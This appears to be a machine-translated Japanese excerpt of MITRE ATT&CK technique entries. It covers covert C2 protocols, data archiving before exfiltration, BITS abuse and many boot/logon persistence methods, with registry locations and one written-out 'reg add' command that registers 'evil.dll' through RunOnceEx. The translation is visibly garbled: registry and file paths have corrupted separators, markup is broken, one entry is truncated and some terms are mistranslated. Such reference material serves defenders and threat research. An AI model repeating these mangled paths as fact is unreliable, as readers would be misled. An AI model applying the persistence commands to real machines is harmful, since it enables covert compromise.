敵対者は、Webブラウジング、ファイル転送、電子メール、DNSなどに使用されるプロトコルをはじめ、さまざまなプロトコルを利用する可能性があります。エンクレーブ内で内部的に行われる接続(プロキシやピボットノードと他のノードとの間の接続など)では、SMB、SSH、RDPなどのプロトコルがよく使われます。
33
T1071.004 アプリケーション層のプロトコル。DNS 侵入者は、既存のトラフィックに紛れ込むことで検知やネットワークフィルタリングを回避するために、DNS(Domain Name System)アプリケーション層のプロトコルを使用して通信を行うことがあります。

DNSプロトコルは、コンピュータネットワークの管理機能を果たしているため、非常に一般的な環境であると考えられます。また、ネットワーク認証が完了する前であっても、DNSトラフィックが許可される場合があります。DNSパケットには、データを隠蔽できる多くのフィールドやヘッダーが含まれています。DNSトンネリングとしてよく知られているように、敵対者はDNSを悪用して、被害者のネットワーク内の支配下にあるシステムと通信する一方で、通常の期待されるトラフィックを模倣することがあります。(引用:PAN DNSトンネリング)(引用:Medium DnsTunneling)
34
T1071.002 アプリケーション層プロトコル。ファイル転送プロトコル 敵対者は、既存のトラフィックに紛れ込むことで検知やネットワークフィルタリングを回避するために、ファイルの転送に関連するアプリケーション層のプロトコルを使用して通信を行うことがあります。

ファイルを転送するFTP、FTPS、TFTPなどのプロトコルは、環境によっては非常に一般的です。 これらのプロトコルから生成されるパケットには、データを隠蔽できる多くのフィールドやヘッダーが含まれている可能性があります。また、転送されたファイルの中にもデータが隠されている可能性があります。敵対者は、これらのプロトコルを悪用して、被害者のネットワーク内の制御下にあるシステムと通信しながら、通常の期待されるトラフィックを模倣することができます。
35
T1071.003 アプリケーション層のプロトコル。メールプロトコル 敵対者は、既存のトラフィックに紛れ込むことで検知やネットワークのフィルタリングを回避するために、電子メールの配信に関連するアプリケーション層のプロトコルを使用して通信を行うことがあります。

電子メールを伝送するSMTP/S、POP3/S、IMAPなどのプロトコルは、環境によっては非常に一般的です。 これらのプロトコルから生成されるパケットには、データを隠蔽できる多くのフィールドやヘッダーが含まれている可能性があります。また、電子メールのメッセージ自体にもデータが隠されている可能性があります。敵対者は、これらのプロトコルを悪用して、被害者のネットワーク内の制御下にあるシステムと通信しながら、通常の期待されるトラフィックを模倣することができます。
36
T1071.001 アプリケーション層のプロトコル。Webプロトコル 敵対者は、既存のトラフィックに紛れ込むことで検知やネットワークフィルタリングを回避するために、ウェブトラフィックに関連するアプリケーション層のプロトコルを使用して通信することがあります。

Web トラフィックを運ぶ HTTP や HTTPS などのプロトコルは、環境では非常に一般的なものかもしれません。HTTP/S パケットには、データを隠すことができる多くのフィールドやヘッダーがあります。敵対者は、これらのプロトコルを悪用して、被害者のネットワーク内の制御下にあるシステムと通信しながら、通常の期待されるトラフィックを模倣することができます。
37
T1010 アプリケーションウィンドウの発見 敵対者は、開いているアプリケーションウィンドウのリストを取得しようとすることがあります。ウィンドウのリストは、システムがどのように使用されているかについての情報を伝えたり、キーロガーによって収集された情報のコンテキストを与えたりすることができます。 38
T1560 収集したデータのアーカイブ 敵対者は、流出する前に収集したデータを圧縮および/または暗号化することがあります。データを圧縮することで、収集したデータを難読化し、ネットワーク上で送信されるデータ量を最小化することができます。

圧縮および暗号化はいずれもデータの流出に先立って行われ、ユーティリティー、サードパーティライブラリ、またはカスタムメソッドを使用して実行できます。
39
T1560.003 収集したデータをアーカイブする。カスタムメソッドによるアーカイブ 敵対者は、流出前に収集したデータを独自の方法で圧縮または暗号化する場合があります。敵対者は、外部のライブラリやユーティリティを参照せずに実装されたXORやストリーム暗号による暗号化など、カスタムのアーカイブ方法を使用することができます。また、有名な圧縮アルゴリズムのカスタム実装も使用されています。(引用:ESET Sednit Part 2) 40
T1560.002 収集したデータをアーカイブする。ライブラリー経由のアーカイブ 敵対者は、サードパーティのライブラリを使用して、流出前に収集したデータを圧縮または暗号化することがあります。Python](https://attack.mitre.org/techniques/T1059/006) rarfile (引用: PyPI RAR), libzip (引用: libzip), zlib (引用: Zlib Github) など、データをアーカイブできるライブラリは数多く存在します。

macOSやLinuxのbzip2、Windowsのzipなど、システムにプリインストールされているアーカイブライブラリーもありますが、これらはデータを暗号化・圧縮する機能を備えています。なお、ライブラリはユーティリティーとは異なります。ライブラリーはコンパイル時にリンクすることができますが、ユーティリティーはサブシェルや同様の実行メカニズムを起動する必要があります。
41
T1560.001 収集したデータをアーカイブする。ユーティリティーによるアーカイブ 敵対者は、サードパーティ製のユーティリティーを使用して、侵入前に収集したデータを圧縮または暗号化することがあります。7-Zip(引用:7zipホームページ)、WinRAR(引用:WinRARホームページ)、WinZip(引用:WinZipホームページ)など、データをアーカイブできるユーティリティは数多く存在します。

LinuxやmacOSでは「tar」、Windowsでは「zip」など、サードパーティ製のユーティリティがプリインストールされている場合があります。
42
T1123 オーディオキャプチャー 敵対者は、コンピュータの周辺機器(マイクやウェブカメラなど)やアプリケーション(音声通話サービスやビデオ通話サービスなど)を利用して音声を録音し、機密性の高い会話を聞いて情報を収集することができます。

マルウェアやスクリプトを使って、オペレーティングシステムやアプリケーションが提供する利用可能なAPIを介して機器とやり取りし、音声を録音することができます。音声ファイルはディスクに書き込まれ、後で流出する可能性があります。
43
T1119 自動収集 システムやネットワークに侵入した敵対者は、自動化された技術を使って内部データを収集することがあります。この技術を実行する方法としては、[Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)を使用して、ファイルの種類、場所、名前などの設定された基準に適合する情報を、特定の時間間隔で検索してコピーすることが考えられます。

この技術は、ファイルを特定して移動させるために、[File and Directory Discovery](https://attack.mitre.org/techniques/T1083)や[Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)などの他の技術の使用を組み込むことができます。
44
T1020 自動化されたエクストルージョン

自動化された流出が使用される場合、[Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041)や[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)など、情報をネットワーク外に転送するための他の流出技術も適用される可能性があります。
45
T1020.001 自動化されたエクストルージョントラフィックの複線化 敵対者は、侵害されたネットワークインフラ上でのデータ流出を自動化するために、トラフィックミラーリングを利用することがあります。 トラフィックミラーリングは、一部のネットワーク機器に搭載されている機能で、ネットワーク解析に使用されています。トラフィックを複製して1つ以上の宛先に転送し、ネットワークアナライザなどの監視機器で解析するように設定することができます。(引用:Cisco Traffic Mirroring) (引用:Juniper Traffic Mirroring)

敵対者は、トラフィックミラーリングを悪用して、自分がコントロールする他のネットワークインフラを介してネットワークトラフィックをミラーリングまたはリダイレクトする可能性があります。トラフィックのリダイレクトを可能にするためにネットワークデバイスを悪意を持って改変することは、[ROMMONkit](https://attack.mitre.org/techniques/T1542/004)や[Patch System Image](https://attack.mitre.org/techniques/T1601/001)によって可能になるかもしれません。(引用:US-CERT-TA18-106A)(引用:Cisco Blog Legacy Device Attacks) 敵対者は、その目的や目標に応じて、[Network Sniffing](https://attack.mitre.org/techniques/T1040)、[Input Capture](https://attack.mitre.org/techniques/T1056)、または[Man-in-the-Middle](https://attack.mitre.org/techniques/T1557)と組み合わせてトラフィックの複製を使用することがあります。
46
T1197 BITSの仕事 侵入者は、BITSジョブを悪用して、悪意のあるペイロードを持続的に実行したり、後始末したりする可能性があります。Windows Background Intelligent Transfer Service(BITS)は、[Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM)を通じて公開される低帯域幅の非同期ファイル転送メカニズムです。(引用:Microsoft COM)(引用:Microsoft BITS) BITSは、アップデータ、メッセンジャー、および他のネットワークアプリケーションを中断することなくバックグラウンドで(利用可能なアイドル帯域幅を使用して)動作することが好まれる他のアプリケーションによって一般的に使用されます。

BITSジョブを作成・管理するためのインターフェイスは、[PowerShell](https://attack.mitre.org/techniques/T1059/001)と[BITSAdmin](https://attack.mitre.org/software/S0190)ツールからアクセスできます。(引用: Microsoft BITS)(引用: Microsoft BITSAdmin)

敵対者は、BITSを悪用して、悪意のあるコードのダウンロード、実行、さらには実行後のクリーンアップを行う可能性があります。BITSのタスクは、BITSのジョブデータベースに自己完結しており、新たなファイルやレジストリの変更はなく、多くの場合、ホストのファイアウォールによって許可されます。(引用:CTU BITS Malware 2016年6月)(引用:Mondok Windows PiggyBack BITS 2007年5月)(引用:Symantec BITS 2007年5月) BITSによる実行は、長期間のジョブを作成したり(デフォルトの最大ライフタイムは90日で拡張可能)、ジョブの完了時やエラー発生時(システム再起動後を含む)に任意のプログラムを起動したりすることで、持続性を実現することもできます。(引用:PaloAlto UBoatRAT 2017年11月)(引用:CTU BITS Malware 2016年6月)

BITSのアップロード機能は、[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)を実行するために使用することもできます。(引用:CTU BITS Malware 2016年6月)
47
T1547 Boot or Logon Autostart 実行 侵入者は、システムの永続性を維持したり、侵入したシステムでより高いレベルの権限を獲得したりするために、システムの起動時やログオン時に自動的にプログラムを実行するようにシステム設定を行うことがあります。オペレーティングシステムには、システムの起動時やアカウントのログオン時にプログラムを自動的に実行する仕組みがある場合があります(引用:Microsoft Run Key)(引用:MSDN Authentication Packages)(引用:Microsoft TimeProvider)(引用:Cylance Reg Persistence Sept 2013)(引用:Linux Kernel Programming)?これらのメカニズムには、特別に指定されたディレクトリに置かれたプログラムを自動的に実行したり、Windowsレジストリなどの設定情報を格納するリポジトリから参照されたりするものがあります。

起動時やログオン時の自動起動プログラムの中には、より高い権限で実行されるものがあるため、敵対者はこれを利用して権限を昇格させることができます。
48
T1547.014 Boot or Logon Autostart 実行。アクティブセットアップ 敵対者は、ローカルマシンのActive Setupにレジストリキーを追加することで、持続性を得ることができます。Active Setupは、ユーザーがログインしたときにプログラムを実行するためのWindowsの仕組みです。

レジストリキーに格納された値は、ユーザーがコンピュータにログインした後に実行されます。これらのプログラムは、ユーザーのコンテキストの下で実行され、アカウントに関連付けられた許可レベルを持つことになります。この値は、ユーザーがコンピュータにログインしたときに実行されるプログラムとして機能します。(引用:Mandiant Glyer APT 2010)(引用:Citizenlab Packrat 2015)(引用:FireEye CFR Watering Hole 2012)(引用:SECURELIST Bright Star 2015)(引用:paloalto Tropic Trooper 2016)

敵対者は、これらのコンポーネントを悪用して、リモートアクセスツールなどのマルウェアを実行し、システムの再起動による持続性を維持することができます。また、敵対者は[マスカレード](https://attack.mitre.org/techniques/T1036)を利用して、レジストリエントリがあたかも正規のプログラムに関連しているように見せかけることができます。
49
T1547.002 ブートまたはログオンのオートスタートの実行認証パッケージ 侵入者は、認証パッケージを悪用して、システムの起動時にDLLを実行することがあります。Windows認証パッケージのDLLは、システム起動時にローカルセキュリティオーソリティ(LSA)プロセスによってロードされます。これらは、複数のログオンプロセスと複数のセキュリティプロトコルのサポートをオペレーティングシステムに提供します。(引用元:MSDN Authentication Packages)

LSA 認証パッケージが提供する自動起動メカニズムを利用して、Windows レジストリの<code>HKLM\CurrentControlSet\</code>に<code>"Authentication Packages"=&lt;target binary&gt;</code>というキー値を持つバイナリへの参照を置くことで、敵対者は永続性を得ることができます。このバイナリは、認証パッケージがロードされたときに、システムによって実行されます。
50
T1547.006 ブートまたはログオンのオートスタートの実行カーネルモジュールとエクステンション 敵対者は、システムの起動時に自動的にプログラムを実行するようにカーネルを改変することがあります。ロード可能なカーネルモジュール(LKM)は、必要に応じてカーネルにロードしたりアンロードしたりできるコードの断片です。LKMは、システムを再起動することなくカーネルの機能を拡張することができます。例えば、モジュールの一種であるデバイスドライバーは、システムに接続されたハードウェアにカーネルがアクセスすることを可能にする。(引用:Linux Kernel Programming)?

悪意を持って使用された場合、LKMは、最高のオペレーティングシステム特権(Ring 0)で実行されるカーネルモードの[Rootkit](https://attack.mitre.org/techniques/T1014)の一種である可能性があります。(引用:Linux Kernel Module Programming Guide)?LKMベースのルートキットの一般的な特徴としては、自己の隠蔽、ファイル、プロセス、ネットワーク活動の選択的隠蔽、さらにログの改ざん、認証されたバックドアの提供、非特権ユーザーのルートアクセスの可能性などがあります。(引用:iDefense Rootkit Overview)

カーネルエクステンション(kextとも呼ばれる)は、LinuxのLKMと同様に、macOSがシステムに機能をロードするために使用されます。これらは、<code>kextload</code>および<code>kextunload</code>コマンドによってロードおよびアンロードされます。macOS Catalina 10.15以降、macOSシステムではカーネルエクステンションは非推奨となっています。(引用:Apple Kernel Extension Deprecation)

敵対者はLKMやkextsを使ってシステムに隠密に潜伏し、特権を昇格させることができます。このような例は自然界で発見されており、いくつかのオープンソースプロジェクトもあります。(引用: Volatility Phalanx2) (引用: CrowdStrike Linux Rootkit) (引用: GitHub Reptile) (引用: GitHub Diamorphine) (引用: RSAC 2015 San Francisco Patrick Wardle) (引用: Synack Secure Kernel Extension Broken) (引用: Securelist Ventir) (引用: Trend Micro Skidmap)
51
T1547.008 ブートまたはログオンのオートスタートの実行LSASSドライバー 敵対者は、侵害されたシステムでの持続性を得るために、LSASSドライバを変更または追加することがあります。Windowsセキュリティサブシステムは、コンピュータやドメインのセキュリティポリシーを管理・実施するコンポーネントの集合体である。ローカルセキュリティ局(LSA)は、ローカルセキュリティポリシーとユーザー認証を担当する主要コンポーネントである。LSAには、他のさまざまなセキュリティ機能に関連する複数のダイナミックリンクライブラリ(DLL)が含まれており、これらはすべて、LSAサブシステムサービス(LSASS)のlsass.exeプロセスのコンテキストで実行されます。(引用:Microsoft Security Subsystem)

敵対者は、持続性を得るためにLSASSドライバを標的にすることがあります。不正なドライバを置き換えたり追加したりすることで(例:[ハイジャック実行フロー](https://attack.mitre.org/techniques/T1574))、敵対者はLSA操作を利用して悪意のあるペイロードを継続的に実行することができます。
52
T1547.011 ブートまたはログオン時のオートスタートの実行Plistの変更 敵対者は plist ファイルを変更して、システムブート時やユーザログイン時にプログラムを実行することがあります。plistファイルは、macOSやOS Xがアプリケーションやサービスを設定するために使用するすべての情報を含んでいます。これらのファイルは、UTF-8でエンコードされ、< >で囲まれた一連のキーによってXMLドキュメントのようにフォーマットされています。これらのファイルには、プログラムがいつ実行されるべきか、実行ファイルのファイルパス、プログラムの引数、必要なOSのパーミッションなどが詳細に記述されています。plistは、<code>/Library/Preferences</code>(昇格した特権で実行される)や<code>~/Library/Preferences</code>(ユーザーの特権で実行される)など、目的に応じて特定の場所に配置されます。

敵対者は、パーシステンスを確立する一環として、plistファイルを変更して自分のコードを実行することができます。引用:Sofacy Komplex Trojan)

ログイン時の実行に使用される特定のplistは、<code>com.apple.loginitems.plist</code>です。(引用:Methods of Mac Malware Persistence) このplistを使用したアプリケーションは、ログインしたユーザのコンテキストで実行され、ユーザがログインするたびに起動されます。サービスマネジメントフレームワークを使用してインストールされたログインアイテムは、システム環境設定に表示されず、それらを作成したアプリケーションによってのみ削除することができます(引用:ログインアイテムの追加)。ユーザーは、システム環境設定に表示される共有ファイルリストを使用してインストールされたログインアイテムを直接制御することができます(引用:ログインアイテムの追加)。これらのアプリケーションの中には、ユーザーに可視化されたダイアログを開くものもありますが、ウィンドウを「隠す」というオプションがあるため、すべてがそうする必要はありません。敵対者が独自のログイン項目を登録したり、既存のログイン項目を修正したりすることができれば、ユーザーがログインするたびに、そのログイン項目を使って永続化機構のコードを実行することができます(引用:Malware Persistence on OS X)(引用:OSX.Dok Malware)。ログイン項目の設定は、APIのメソッド<code>SMLoginItemSetEnabled</code>を使って行うことができますが、[AppleScript](https://attack.mitre.org/techniques/T1059/002)などのスクリプト言語でも行うことができます。(引用:Login Itemsの追加)
53
T1547.010 ブートまたはログオンのオートスタートの実行ポートモニター 攻撃者は、ポートモニターを使用して、システムの起動時に攻撃者が提供するDLLを実行し、永続化や権限昇格を図ることがあります。ポートモニターは、<code>AddMonitor</code>というAPIコールで、起動時にロードするDLLを設定することができます。(引用:AddMonitor) このDLLは、<code>C:Windows\System32</code>に配置することができ、起動時にプリントスプーラーサービスのspoolsv.exeによってロードされます。また、spoolsv.exeプロセスはSYSTEMレベルのパーミッションで実行されます。(Citation: Bloxham) また、パーミッションによって、そのDLLの完全修飾パス名を<code>HKLM\SYSTEM#CurrentControlSet\ControlPrint\Monitors</code>に書き込むことができれば、任意のDLLをロードすることができます。

レジストリキーには、以下のようなエントリが含まれています。

* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port

敵対者はこの手法を用いて、起動時に悪意のあるコードをロードし、システムの再起動時に持続させてSYSTEMとして実行することができます。
54
T1547.012 ブートまたはログオン時のオートスタートの実行。プリントプロセッサ 敵対者は、プリントプロセッサを悪用して、システムの起動時に悪意のあるDLLを実行し、持続性の確保や権限の昇格を図ることがあります。

敵対者は、起動時に悪意のあるDLLをロードするプリントプロセッサを追加することで、プリントスプーラーサービスを悪用する可能性があります。プリントプロセッサは、<code>SeLoadDriverPrivilege</code>が有効になっているアカウントで<code>AddPrintProcessor</code>のAPIコールを通じてインストールすることができます。また、プリントプロセッサーをプリントスプーラーサービスに登録するには、DLLを指すレジストリキーとして、<code>HKLM\SYSTEM\[CurrentControlSet or ControlSet001]を追加する必要があります。プリントプロセッサが正しくインストールされるためには、<code>GetPrintProcessorDirectory</code> APIコールで見つけることができるシステムのプリントプロセッサのディレクトリに配置されていなければならない。(引用:Microsoft AddPrintProcessor 2018年5月) プリントプロセッサがインストールされた後、それらを実行するためには、ブート時に起動するプリントスプーラーサービスを再起動する必要があります。(引用:ESET PipeMon 2020年5月) プリントスプーラーサービスはSYSTEMレベルの権限で実行されるため、敵対者がインストールしたプリントプロセッサは、昇格した権限で実行される可能性があります。
55
T1547.007 ブートまたはログオン時のオートスタートの実行。アプリケーションの再起動 敵対者は、ユーザがログインしたときにアプリケーションを自動的に実行するように plist ファイルを変更することがあります。Mac OS X 10.7 (Lion)では、再起動後のマシンにログインしたときに、特定のアプリケーションを再度開くように指定することができます。この設定は通常、GUI(グラフィカル・ユーザー・インターフェイス)を使ってアプリケーションごとに行いますが、この情報を含むプロパティリストファイル(plist)が<code>~/Library/Preferences/com.apple.loginwindow.plist</code>と<code>~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist</code>に用意されています。apple.loginwindow.* .plist</code>にあります。

敵対者は、これらのファイルのいずれかを直接変更して、悪意のある実行ファイルへのリンクを含めることで、ユーザーがマシンを再起動するたびに持続的なメカニズムを提供することができます(引用:Methods of Mac Malware Persistence)。
56
T1547.001 ブートまたはログオンのオートスタートの実行レジストリのランキー/スタートアップフォルダ 敵対者は、スタートアップフォルダにプログラムを追加したり、レジストリのランキーでプログラムを参照したりすることで、持続性を実現することができます。レジストリやスタートアップフォルダの「ランキー」にエントリを追加すると、ユーザーがログインしたときに参照したプログラムが実行されます。(引用:Microsoft Run Key) これらのプログラムは、ユーザーのコンテキストの下で実行され、アカウントに関連した権限レベルを持つことになります。

スタートアップフォルダ内にプログラムを配置することでも、ユーザーのログイン時にそのプログラムが実行されることになります。個々のユーザーアカウントのスタートアップフォルダの場所と、どのユーザーアカウントがログインしたかに関わらずチェックされるシステム全体のスタートアップフォルダがあります。現在のユーザーのスタートアップフォルダのパスは、<code>C:Users\[Username]‾‾AppData‾Roaming‾Microsoft‾Windows‾Start Menu‾Programs‾Startup</code>となります。全ユーザーのスタートアップフォルダのパスは、<code>C:ProgramData‾Microsoft‾Windows‾Start Menu‾Programs‾StartUp</code>となります。

Windowsシステムでは、以下のランキーがデフォルトで作成されています。

* <code>HKEY_CURRENT_USER\Software\Microsoft Windows\CurrentVersion\Run</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft Windows\CurrentVersion\RunOnce</code>
* <<code>HKEY_LOCAL_MACHINE\Software\MicrosoftWindows\CurrentVersion\Run</code>
* <code>HKEY_LOCAL_MACHINE\Software\MicrosoftWindows\CurrentVersion\RunOnce</code>

実行キーは複数のハイブの下に存在する場合があります。(引用:Microsoft Wow6432Node 2018)(引用:Malwarebytes Wow6432Node 2016) <code>HKEY_LOCAL_MACHINESoftware\MicrosoftWindows\CurrentVersion\RunOnceEx</code>もありますが、Windows Vista以降ではデフォルトでは作成されません。レジストリのランキーエントリは、プログラムを直接参照したり、依存関係としてリストアップしたりすることができます。(引用:Microsoft RunOnceEx APR 2018) 例えば、RunOnceExの「Depend」キーを使って、ログオン時にDLLをロードすることが可能です。 <code>reg add HKLM˶SOFTWARE˶Microsoft˶Windows˶CurrentVersion˶RunOnceEx˶0001˶Depend /v 1 /d "C:temp˶evil[.]dll"</code> (引用:Oddvar Moe RunOnceEx Mar 2018)

以下のレジストリキーを使用して、スタートアップフォルダの項目を永続化するように設定することができます。

* <code>HKEY_CURRENT_USER\Software\Microsoft Windows\CurrentVersion\Explorer\User Shell Folders</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft Windows\CurrentVersion\Explorer\Shell Folders</code>
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\MicrosoftWindows\CurrentVersion\Explorer\Shell Folders</code>
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\MicrosoftWindows\CurrentVersion\Explorer\User Shell Folders</code>

以下のレジストリキーは、ブート時のサービスの自動起動を制御することができます。

* <code>HKEY_LOCAL_MACHINE\Software\Windows\CurrentVersion\RunServicesOnce</code>
* <code>HKEY_CURRENT_USER\Software\MicrosoftWindows\CurrentVersionRunServicesOnce</code>
* <code>HKEY_LOCAL_MACHINE_Software\MicrosoftWindows\CurrentVersion\RunServices</code>
* <code>HKEY_CURRENT_USER\Software\MicrosoftWindows\CurrentVersion\RunServices</code>

起動プログラムを指定するポリシー設定を使用すると、次の2つのレジストリキーのいずれかに対応する値が作成されます。

* <code>HKEY_LOCAL_MACHINE\Software%%Microsoft%%Windows%%CurrentVersion%%Policies%%Explorer%%Run</code>
* <codeHKEY_CURRENT_USER˶Software˶MicrosoftWindows˶CurrentVersion˶Policies˶Explorer˶Run˶</code>

Winlogonキーは、ユーザーがWindows 7を実行しているコンピューターにログオンしたときに発生するアクションを制御します。これらのアクションのほとんどは、オペレーティングシステムの制御下にありますが、ここにカスタムアクションを追加することもできます。The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit</code> and <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell</code> subkeys can automatically launch programs.

レジストリキー<code>HKEY_CURRENT_USER\Software\MicrosoftWindows NT\CurrentVersion\Windows</code>のload値にリストアップされたプログラムは、任意のユーザーがログオンしたときに実行されます。

デフォルトでは、レジストリキー <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Session Manager</code> のマルチストリング <code>BootExecute</code> の値が <code>autocheck autochk *</code> に設定されています。この値は、システムが異常にシャットダウンされた場合に、Windowsが起動時にハードディスクのファイルシステムの整合性をチェックするようにします。

敵対者は、このレジストリ値に他のプログラムやプロセスを追加して、起動時に自動的に起動させることができます。敵対者は、これらの設定場所を使用して、リモートアクセスツールなどのマルウェアを実行し、システムの再起動後も持続させることができます。また、敵対者は[マスカレード](https://attack.mitre.org/techniques/T1036)を使用して、レジストリエントリがあたかも正規のプログラムに関連しているかのように見せかけることができます。
57
T1547.005 ブートまたはログオン時のオートスタートの実行セキュリティサポートプロバイダ 敵対者は、セキュリティサポートプロバイダ(SSP)を悪用して、システムの起動時にDLLを実行することがあります。Windows の SSP DLL は、システム起動時にローカルセキュリティオーソリティ (LSA) プロセスにロードされます。LSA にロードされると、SSP DLL は Windows に保存されている暗号化されたパスワードや平文のパスワード(ログオンしているユーザーのドメイン・パスワードやスマート・カードの PIN など)にアクセスできるようになります。

SSP の設定は、<code>HKLM\SYSTEM\CurrentControlSet\Lsa\Security Packages</code>および<code>HKLM%%CurrentControlSet\Lsa\OSConfig\Security Packages</code>という 2 つのレジストリ キーに保存されます。敵対者は、これらのレジストリキーを変更して新たなSSPを追加し、次回のシステム起動時やWindows API関数のAddSecurityPackageが呼び出された際にロードされる可能性があります(引用:Graeber 2014)
58
T1547.009 ブートまたはログオン時のオートスタートの実行。ショートカットの変更 敵対者は、システムの起動時やユーザのログイン時にプログラムを実行するために、ショートカットを作成または編集する可能性があります。ショートカットやシンボリックリンクは、他のファイルやプログラムを参照する方法で、ショートカットがクリックされたり、システムの起動プロセスで実行されたりすると、そのファイルやプログラムが開かれたり、実行されたりします。

敵対者は、持続性のあるツールを実行するためにショートカットを使用する可能性があります。敵対者は、[マスカレード](https://attack.mitre.org/techniques/T1036)を使って正規のプログラムのように見せかける間接的な手段として、新しいショートカットを作成する可能性があります。また、ターゲットパスを編集したり、既存のショートカットを完全に置き換えたりして、意図した正規のプログラムの代わりに自分のツールが実行されるようにすることもできます。
59
T1547.003 ブートまたはログオンのオートスタート実行。タイムプロバイダー 侵入者は、タイムプロバイダを悪用して、システムの起動時にDLLを実行することがあります。Windows Timeサービス(W32Time)は、ドメイン間およびドメイン内での時刻の同期を可能にします。(引用:Microsoft W32Time Feb 2018) W32Timeのタイムプロバイダは、ハードウェア/ネットワークリソースからタイムスタンプを取得し、これらの値を他のネットワーククライアントに出力する役割を果たします。(引用:Microsoft TimeProvider)

タイムプロバイダーは、<code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\</code>のサブキーに登録されたダイナミックリンクライブラリ(DLL)として実装されています。(引用:Microsoft TimeProvider) タイムプロバイダマネージャは、サービスコントロールマネージャの指示により、システムの起動時やパラメータが変更されたときに、このキーの下にリストアップされ、有効になっているタイムプロバイダをロードして起動する。(引用:Microsoft TimeProvider)

敵対者は、このアーキテクチャを悪用して永続性を確立する可能性があります。具体的には、悪意のあるDLLをタイムプロバイダとして登録および有効化します。タイムプロバイダの登録には管理者権限が必要ですが、実行はローカルサービスアカウントのコンテキストで実行されます。(引用:Github W32Time 2017年10月)
60
T1547.004 ブートまたはログオンのオートスタートの実行。WinlogonヘルパーDLL 敵対者は、ユーザーのログイン時にWinlogonの機能を悪用してDLLや実行ファイルを実行する可能性があります。Winlogon.exeは、ログオン/ログオフ時の動作や、Ctrl-Alt-DeleteによるSAS(Secure Attention Sequence)の動作を担うWindowsコンポーネントです。なお、Winlogon.exeをサポートするヘルパープログラムや機能を管理するために、<code>HKLM_Software[\Wow6432Node\]および<code>HKCU_Software_Microsoft‾Windows NT‾CurrentVersion‾Winlogon‾</code>のレジストリエントリが使用されます。(引用: Cylance Reg Persistence Sept 2013)

これらのレジストリキーを悪意を持って変更すると、Winlogonが悪意のあるDLLや実行ファイルをロードして実行する可能性があります。具体的には、以下のサブキーが悪用される可能性があることが知られています。(Citation: Cylance Reg Persistence Sept 2013)

* Winlogon\Notify - Winlogonイベントを処理する通知パッケージDLLを指す
* Winlogon\Userinit - userinit.exe(ユーザーログオン時に実行されるユーザー初期化プログラム)を指す
* Winlogon\Shell - explorer.exe(ユーザーログオン時に実行されるシステムシェル)を指す

敵対者はこれらの機能を利用して悪意のあるコードを繰り返し実行し、持続性を確立する可能性があります。
61
T1547.013 ブートまたはログオンのオートスタートの実行。XDG 自動起動エントリ 侵入者は、XDG の自動起動エントリを変更して、システムの起動時にプログラムやコマンドを実行する可能性があります。XDG に準拠している Linux デスクトップ環境では、XDG 自動起動エントリの機能が実装されています。これらのエントリを使用すると、ユーザーのログオン後のデスクトップ環境の起動時に、アプリケーションを自動的に起動することができます。デフォルトでは、XDG autostart エントリは <code>/etc/xdg/autostart</code> または <code>~/.config/autostart</code> ディレクトリに保存され、拡張子は .desktop となります。(Citation: Free Desktop Application Autostart Feb 2006)

XDG autostart エントリーファイル内の <code>Type</code> キーは、エントリーがアプリケーション (タイプ 1)、リンク (タイプ 2)、ディレクトリ (タイプ 3) のいずれであるかを指定します。<code>Name</code>キーは、作成者が割り当てた任意の名前を示し、<code>Exec</code>キーは、実行するアプリケーションとコマンドライン引数を示します。(引用:Free Desktop Entry Keys)

敵対者は、XDG autostart エントリを使用して、デスクトップ環境の起動時にリモート アクセス ツールなどの悪意のあるコマンドやペイロードを実行することで、永続性を保つことができます。XDG autostart エントリに含まれるコマンドは、ユーザーのログオン後に、現在ログオンしているユーザーのコンテキストで実行されます。また、敵対者は[マスカレード](https://attack.mitre.org/techniques/T1036)を使用して、XDG の自動起動エントリがあたかも正規のプログラムに関連しているように見せかけることがあります。
62
T1037 ブートまたはログオンの初期化スクリプト 敵対者は、起動時やログオン時の初期化時に自動的に実行されるスクリプトを使って永続性を確立することがあります。初期化スクリプトは、他のプログラムを実行したり、内部のログサーバに情報を送信したりする管理機能を実行するために使用できます。

敵対者は、これらのスクリプトを使用して、単一のシステムでパーシステンスを維持することがあります。ログオンスクリプトのアクセス構成によっては、ローカルの認証情報または管理者アカウントが必要になる場合があります。

ブートスクリプトやログオン初期化スクリプトの中には、より高い権限で実行されるものがあるため、敵対者は自分の権限を昇格させることもできるかもしれません。
63
T1037.002 ブートまたはログオンの初期化スクリプト。ログオンスクリプト(Mac macOSでは、特定のユーザーがシステムにログインするたびに、ログインスクリプト(ログインフックと呼ばれる)を実行することができます。ログインフックは、ユーザーがログインしたときに特定のスクリプトを実行するようにMac OS Xに指示しますが、[Startup Items](https://attack.mitre.org/techniques/T1037/005)とは異なり、ログインフックは昇格したrootユーザーとして実行されます。(引用:ログインフックの作成)

敵対者は、これらのログインフックを使用して、単一のシステム上で永続性を維持することができます。(引用:S1 macO Persistence) ログインフックのスクリプトにアクセスすることで、敵対者はさらに悪意のあるコードを挿入することができる可能性があります。しかし、ログインフックは一度に1つしか存在できず、フックのアクセス設定によっては、ローカルの認証情報または管理者アカウントが必要になることがあります。
64
T1037.001 ブートまたはログオンの初期化スクリプト。ログオンスクリプト(Windows 敵対者は、永続性を確立するために、ログオン時の初期化で自動的に実行されるWindowsのログオンスクリプトを使用する場合があります。Windowsでは、特定のユーザーまたはユーザーグループがシステムにログインするたびに、ロゴンスクリプトを実行することができます。(引用:TechNet Logon Scripts) これは、<code>HKCUEnvironment\UserInitMprLogonScript</code>レジストリキーにスクリプトへのパスを追加することで実現されます。(引用:Hexacorn Logon Scripts)

